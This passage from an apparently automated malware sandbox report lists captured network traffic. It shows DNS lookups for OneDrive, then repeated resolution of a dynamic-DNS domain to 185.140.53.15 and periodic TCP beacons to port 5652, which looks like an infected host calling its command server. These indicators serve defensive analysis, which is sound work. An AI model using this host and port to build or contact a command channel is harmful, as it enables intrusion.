                            Sep 27, 2021 20:41:45.809561968 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:45.834741116 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:46.337189913 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:46.362776995 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:46.868498087 CEST498725652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:46.894069910 CEST565249872185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:48.060870886 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:48.086034060 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:48.587595940 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:48.613167048 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:49.118729115 CEST498735652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:49.143979073 CEST565249873185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:50.167882919 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:50.193130016 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:50.696935892 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:50.722172022 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:51.228236914 CEST498745652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:51.254547119 CEST565249874185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:52.278573990 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:52.304378033 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:52.806636095 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:52.834062099 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:53.337838888 CEST498755652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:53.363450050 CEST565249875185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:54.387445927 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:54.412591934 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:54.916549921 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:54.942821980 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:55.447508097 CEST498765652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:55.474395990 CEST565249876185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:56.494640112 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:56.520145893 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:57.025827885 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:57.051889896 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:57.556952953 CEST498775652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:57.582830906 CEST565249877185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:58.607630014 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:41:58.634394884 CEST565249878185.140.53.15192.168.2.4
                            Sep 27, 2021 20:41:59.135330915 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:05.151293039 CEST498785652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:05.176501036 CEST565249878185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:06.621654987 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:06.647058010 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:07.151632071 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:07.176831961 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:07.682760000 CEST498795652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:07.710411072 CEST565249879185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:08.729939938 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:08.755093098 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:09.261085033 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:09.286627054 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:09.792313099 CEST498805652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:09.818428993 CEST565249880185.140.53.15192.168.2.4
                            Sep 27, 2021 20:42:10.844146967 CEST498815652192.168.2.4185.140.53.15
                            Sep 27, 2021 20:42:10.870908976 CEST565249881185.140.53.15192.168.2.4

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Sep 27, 2021 20:39:50.712766886 CEST5802853192.168.2.48.8.8.8
                            Sep 27, 2021 20:39:50.742908955 CEST53580288.8.8.8192.168.2.4
                            Sep 27, 2021 20:39:54.559814930 CEST5309753192.168.2.48.8.8.8
                            Sep 27, 2021 20:39:54.586869001 CEST53530978.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:00.329817057 CEST4925753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:00.377412081 CEST53492578.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:01.487426043 CEST6238953192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:01.589236021 CEST53623898.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:26.069981098 CEST4991053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:26.090744019 CEST53499108.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:26.709034920 CEST5585453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:26.736041069 CEST53558548.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:28.191519976 CEST6454953192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:28.212397099 CEST53645498.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:30.296859026 CEST6315353192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:30.310684919 CEST53631538.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:32.554495096 CEST5299153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:32.567531109 CEST53529918.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:35.508255959 CEST5370053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:35.522198915 CEST53537008.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:35.778544903 CEST5172653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:35.861727953 CEST53517268.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:36.340289116 CEST5679453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:36.441093922 CEST53567948.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:37.736310959 CEST5653453192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:37.749092102 CEST53565348.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:39.840715885 CEST5662753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:39.854439974 CEST53566278.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:42.579866886 CEST5662153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:42.592500925 CEST53566218.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:42.794097900 CEST6311653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:42.857904911 CEST53631168.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:44.545025110 CEST6407853192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:44.717713118 CEST53640788.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:46.670589924 CEST6480153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:46.683717966 CEST53648018.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:47.422678947 CEST6172153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:47.445765018 CEST53617218.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:49.533044100 CEST5125553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:49.554491997 CEST53512558.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:52.200242996 CEST6152253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:52.234039068 CEST53615228.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:54.499921083 CEST5233753192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:54.513664007 CEST53523378.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:55.821634054 CEST5504653192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:55.889620066 CEST53550468.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:56.719162941 CEST4961253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:56.794174910 CEST4928553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:56.808721066 CEST53492858.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:56.828322887 CEST53496128.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:57.487617016 CEST5060153192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:57.515784025 CEST53506018.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:57.897201061 CEST6087553192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:57.985850096 CEST53608758.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.307404041 CEST5644853192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:58.380373001 CEST53564488.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.864598036 CEST5917253192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:58.879224062 CEST53591728.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:58.999835014 CEST6242053192.168.2.48.8.8.8
                            Sep 27, 2021 20:40:59.013353109 CEST53624208.8.8.8192.168.2.4
                            Sep 27, 2021 20:40:59.997201920 CEST6057953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:00.010282040 CEST53605798.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:00.552804947 CEST5018353192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:00.629829884 CEST53501838.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:01.101335049 CEST6153153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:01.114439011 CEST53615318.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:02.316555023 CEST4922853192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:02.329612970 CEST53492288.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:03.211925030 CEST5979453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:03.235649109 CEST53597948.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:04.239950895 CEST5591653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:04.253524065 CEST53559168.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:04.683504105 CEST5275253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:04.696125984 CEST53527528.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:05.504503965 CEST6054253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:05.526628971 CEST53605428.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:07.787156105 CEST6068953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:07.801413059 CEST53606898.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:11.246792078 CEST6420653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:11.259496927 CEST53642068.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:13.020337105 CEST5090453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:13.040038109 CEST53509048.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:13.486362934 CEST5752553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:13.499980927 CEST53575258.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:15.690439939 CEST5381453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:15.703810930 CEST53538148.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:17.904463053 CEST5341853192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:17.924951077 CEST53534188.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:20.089129925 CEST6283353192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:20.102364063 CEST53628338.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:22.204933882 CEST5926053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:22.218985081 CEST53592608.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:24.323244095 CEST4994453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:24.335789919 CEST53499448.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:26.440473080 CEST6330053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:26.453758955 CEST53633008.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:28.589694023 CEST6144953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:28.603553057 CEST53614498.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:30.934642076 CEST5127553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:30.956043959 CEST53512758.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:33.083949089 CEST6349253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:33.111673117 CEST53634928.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:35.215830088 CEST5894553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:35.228498936 CEST53589458.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:37.323995113 CEST6077953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:37.337399006 CEST53607798.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:38.495858908 CEST6401453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:38.526067019 CEST53640148.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:39.433008909 CEST5709153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:39.455291986 CEST53570918.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:39.548918962 CEST5590453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:39.562026024 CEST53559048.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:41.558228970 CEST5210953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:41.570872068 CEST53521098.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:43.668311119 CEST5445053192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:43.690537930 CEST53544508.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:45.795187950 CEST4937453192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:45.808367014 CEST53493748.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:48.034203053 CEST5043653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:48.047791004 CEST53504368.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:50.154508114 CEST6260553192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:50.166790962 CEST53626058.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:52.264264107 CEST5425653192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:52.277652025 CEST53542568.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:54.373840094 CEST5218953192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:54.386415005 CEST53521898.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:56.481215954 CEST5613153192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:56.493730068 CEST53561318.8.8.8192.168.2.4
                            Sep 27, 2021 20:41:58.592732906 CEST6299253192.168.2.48.8.8.8
                            Sep 27, 2021 20:41:58.606566906 CEST53629928.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:06.596437931 CEST5443253192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:06.612971067 CEST53544328.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:08.715605974 CEST5722753192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:08.729338884 CEST53572278.8.8.8192.168.2.4
                            Sep 27, 2021 20:42:10.826145887 CEST5838353192.168.2.48.8.8.8
                            Sep 27, 2021 20:42:10.839230061 CEST53583838.8.8.8192.168.2.4

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Sep 27, 2021 20:40:00.329817057 CEST192.168.2.48.8.8.80xaf7eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:01.487426043 CEST192.168.2.48.8.8.80x72ffStandard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:26.069981098 CEST192.168.2.48.8.8.80xd18aStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:28.191519976 CEST192.168.2.48.8.8.80x61d9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:30.296859026 CEST192.168.2.48.8.8.80x4be0Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:32.554495096 CEST192.168.2.48.8.8.80x500fStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.508255959 CEST192.168.2.48.8.8.80x5b70Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.778544903 CEST192.168.2.48.8.8.80x6992Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:36.340289116 CEST192.168.2.48.8.8.80xf6e3Standard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:37.736310959 CEST192.168.2.48.8.8.80xf757Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:39.840715885 CEST192.168.2.48.8.8.80x941cStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:42.794097900 CEST192.168.2.48.8.8.80xe14eStandard query (0)onedrive.live.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:44.545025110 CEST192.168.2.48.8.8.80xd5fcStandard query (0)bl30uw.sn.files.1drv.comA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:47.422678947 CEST192.168.2.48.8.8.80x216Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:49.533044100 CEST192.168.2.48.8.8.80x813Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:52.200242996 CEST192.168.2.48.8.8.80x73faStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:54.499921083 CEST192.168.2.48.8.8.80x620bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:56.794174910 CEST192.168.2.48.8.8.80xf61cStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:58.999835014 CEST192.168.2.48.8.8.80xa4a5Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:01.101335049 CEST192.168.2.48.8.8.80x4f8bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:03.211925030 CEST192.168.2.48.8.8.80x4880Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:05.504503965 CEST192.168.2.48.8.8.80xd44dStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:07.787156105 CEST192.168.2.48.8.8.80xca1eStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:11.246792078 CEST192.168.2.48.8.8.80x97abStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:13.486362934 CEST192.168.2.48.8.8.80x4556Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:15.690439939 CEST192.168.2.48.8.8.80xfea6Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:17.904463053 CEST192.168.2.48.8.8.80xc846Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:20.089129925 CEST192.168.2.48.8.8.80x4bfdStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:22.204933882 CEST192.168.2.48.8.8.80x5dfdStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:24.323244095 CEST192.168.2.48.8.8.80x3c7Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:26.440473080 CEST192.168.2.48.8.8.80x6c58Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:28.589694023 CEST192.168.2.48.8.8.80xb11bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:30.934642076 CEST192.168.2.48.8.8.80x29bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:33.083949089 CEST192.168.2.48.8.8.80xf9b9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:35.215830088 CEST192.168.2.48.8.8.80x7da5Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:37.323995113 CEST192.168.2.48.8.8.80x2de7Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:39.433008909 CEST192.168.2.48.8.8.80xf6a1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:41.558228970 CEST192.168.2.48.8.8.80xc97dStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:43.668311119 CEST192.168.2.48.8.8.80xdadcStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:45.795187950 CEST192.168.2.48.8.8.80xc1b1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:48.034203053 CEST192.168.2.48.8.8.80x4ee2Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:50.154508114 CEST192.168.2.48.8.8.80xd265Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:52.264264107 CEST192.168.2.48.8.8.80x5e9bStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:54.373840094 CEST192.168.2.48.8.8.80x88b9Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:56.481215954 CEST192.168.2.48.8.8.80xd752Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:58.592732906 CEST192.168.2.48.8.8.80x14d1Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:06.596437931 CEST192.168.2.48.8.8.80x1b36Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:08.715605974 CEST192.168.2.48.8.8.80x346aStandard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)
                            Sep 27, 2021 20:42:10.826145887 CEST192.168.2.48.8.8.80xfb67Standard query (0)ongod4ever.ddns.netA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Sep 27, 2021 20:40:00.377412081 CEST8.8.8.8192.168.2.40xaf7eNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:01.589236021 CEST8.8.8.8192.168.2.40x72ffNo error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:01.589236021 CEST8.8.8.8192.168.2.40x72ffNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:26.090744019 CEST8.8.8.8192.168.2.40xd18aNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:28.212397099 CEST8.8.8.8192.168.2.40x61d9No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:30.310684919 CEST8.8.8.8192.168.2.40x4be0No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:32.567531109 CEST8.8.8.8192.168.2.40x500fNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.522198915 CEST8.8.8.8192.168.2.40x5b70No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:35.861727953 CEST8.8.8.8192.168.2.40x6992No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:36.441093922 CEST8.8.8.8192.168.2.40xf6e3No error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:36.441093922 CEST8.8.8.8192.168.2.40xf6e3No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:37.749092102 CEST8.8.8.8192.168.2.40xf757No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:39.854439974 CEST8.8.8.8192.168.2.40x941cNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:42.857904911 CEST8.8.8.8192.168.2.40xe14eNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:44.717713118 CEST8.8.8.8192.168.2.40xd5fcNo error (0)bl30uw.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:44.717713118 CEST8.8.8.8192.168.2.40xd5fcNo error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
                            Sep 27, 2021 20:40:47.445765018 CEST8.8.8.8192.168.2.40x216No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:49.554491997 CEST8.8.8.8192.168.2.40x813No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:52.234039068 CEST8.8.8.8192.168.2.40x73faNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:54.513664007 CEST8.8.8.8192.168.2.40x620bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:56.808721066 CEST8.8.8.8192.168.2.40xf61cNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:40:59.013353109 CEST8.8.8.8192.168.2.40xa4a5No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:01.114439011 CEST8.8.8.8192.168.2.40x4f8bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:03.235649109 CEST8.8.8.8192.168.2.40x4880No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:05.526628971 CEST8.8.8.8192.168.2.40xd44dNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:07.801413059 CEST8.8.8.8192.168.2.40xca1eNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:11.259496927 CEST8.8.8.8192.168.2.40x97abNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:13.499980927 CEST8.8.8.8192.168.2.40x4556No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:15.703810930 CEST8.8.8.8192.168.2.40xfea6No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:17.924951077 CEST8.8.8.8192.168.2.40xc846No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:20.102364063 CEST8.8.8.8192.168.2.40x4bfdNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:22.218985081 CEST8.8.8.8192.168.2.40x5dfdNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:24.335789919 CEST8.8.8.8192.168.2.40x3c7No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:26.453758955 CEST8.8.8.8192.168.2.40x6c58No error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
                            Sep 27, 2021 20:41:28.603553057 CEST8.8.8.8192.168.2.40xb11bNo error (0)ongod4ever.ddns.net185.140.53.15A (IP address)IN (0x0001)
